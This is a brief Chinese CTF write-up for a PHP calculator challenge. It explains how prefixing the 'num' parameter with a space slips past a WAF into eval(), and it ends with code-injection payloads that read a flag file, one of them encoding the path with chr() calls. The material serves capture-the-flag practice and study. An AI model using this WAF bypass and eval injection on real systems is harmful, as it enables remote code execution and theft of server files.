参考链接:[传送门](https://mp.weixin.qq.com/s/iyzOKWbLqDX5Y6Fad5Exmw)
CTF讨论群:946220807
wp
一种熟悉的感觉。
相信很多人都遇到个问题。只要num传入字母。就会403。然后一脸懵逼的做下一道题,/xyx。这是因为有waf,匹配num的值是否为数字。首先得先绕过这个waf。
bypass:https://www.freebuf.com/articles/web/213359.html
好好看这篇文章就懂了。
num传参前加个空格就可以绕过waf。并且php解析时会忽略空格。这样就完美的进入了eval函数。
num= 1;var_dump(file_get_contents(/flag))
calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
